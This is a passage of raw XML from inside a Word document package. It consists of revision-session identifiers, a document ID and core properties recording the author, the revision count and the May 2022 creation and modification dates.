    <w:lvl w:ilvl="0" w:tplc="9EAA6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049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1C"/>
    <w:rsid w:val="0001194F"/>
    <w:rsid w:val="00060EBE"/>
    <w:rsid w:val="0006675E"/>
    <w:rsid w:val="00066D40"/>
    <w:rsid w:val="00081989"/>
    <w:rsid w:val="00082742"/>
    <w:rsid w:val="00112316"/>
    <w:rsid w:val="00117243"/>
    <w:rsid w:val="001651D8"/>
    <w:rsid w:val="001B0E08"/>
    <w:rsid w:val="001B4661"/>
    <w:rsid w:val="001D5EF0"/>
    <w:rsid w:val="001F3DE6"/>
    <w:rsid w:val="00223CC5"/>
    <w:rsid w:val="00265D24"/>
    <w:rsid w:val="002A0F6C"/>
    <w:rsid w:val="002A60D1"/>
    <w:rsid w:val="003136EB"/>
    <w:rsid w:val="00346DCC"/>
    <w:rsid w:val="003E4DE3"/>
    <w:rsid w:val="00423E92"/>
    <w:rsid w:val="004305A0"/>
    <w:rsid w:val="0050116D"/>
    <w:rsid w:val="005119CD"/>
    <w:rsid w:val="00573BC3"/>
    <w:rsid w:val="005C622D"/>
    <w:rsid w:val="0061594B"/>
    <w:rsid w:val="006405C6"/>
    <w:rsid w:val="00663939"/>
    <w:rsid w:val="006738BE"/>
    <w:rsid w:val="006A4ED9"/>
    <w:rsid w:val="006D2F25"/>
    <w:rsid w:val="00725FD3"/>
    <w:rsid w:val="00734C13"/>
    <w:rsid w:val="00741002"/>
    <w:rsid w:val="0080113E"/>
    <w:rsid w:val="0082622C"/>
    <w:rsid w:val="00865C76"/>
    <w:rsid w:val="00867940"/>
    <w:rsid w:val="008A341C"/>
    <w:rsid w:val="008B2FF1"/>
    <w:rsid w:val="008C1593"/>
    <w:rsid w:val="008E1069"/>
    <w:rsid w:val="0095551C"/>
    <w:rsid w:val="009775B2"/>
    <w:rsid w:val="009C1BDB"/>
    <w:rsid w:val="009D7FF1"/>
    <w:rsid w:val="009E04A4"/>
    <w:rsid w:val="009E4A4C"/>
    <w:rsid w:val="00A06096"/>
    <w:rsid w:val="00AA62BE"/>
    <w:rsid w:val="00AD6370"/>
    <w:rsid w:val="00AF6E6E"/>
    <w:rsid w:val="00B164F9"/>
    <w:rsid w:val="00B44F8E"/>
    <w:rsid w:val="00B80C49"/>
    <w:rsid w:val="00BD1519"/>
    <w:rsid w:val="00C60F83"/>
    <w:rsid w:val="00C71284"/>
    <w:rsid w:val="00C875E5"/>
    <w:rsid w:val="00CF4C4D"/>
    <w:rsid w:val="00D93EB1"/>
    <w:rsid w:val="00DD452C"/>
    <w:rsid w:val="00DD783E"/>
    <w:rsid w:val="00E2301E"/>
    <w:rsid w:val="00E31D5B"/>
    <w:rsid w:val="00E44C7E"/>
    <w:rsid w:val="00E53F8C"/>
    <w:rsid w:val="00E84B8E"/>
    <w:rsid w:val="00EC42D0"/>
    <w:rsid w:val="00EC5BF2"/>
    <w:rsid w:val="00EE0437"/>
    <w:rsid w:val="00F2313D"/>
    <w:rsid w:val="00FA109E"/>
    <w:rsid w:val="00FB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156B"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{2254BE81-7900-46D3-A43B-86DC6C61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Huzefa Surme</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Huzefa Surme</cp:lastModifiedBy>
  <cp:revision>75</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-05-12T09:59:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-05-21T05:38:00Z</dcterms:modified>
</cp:coreProperties>
</file>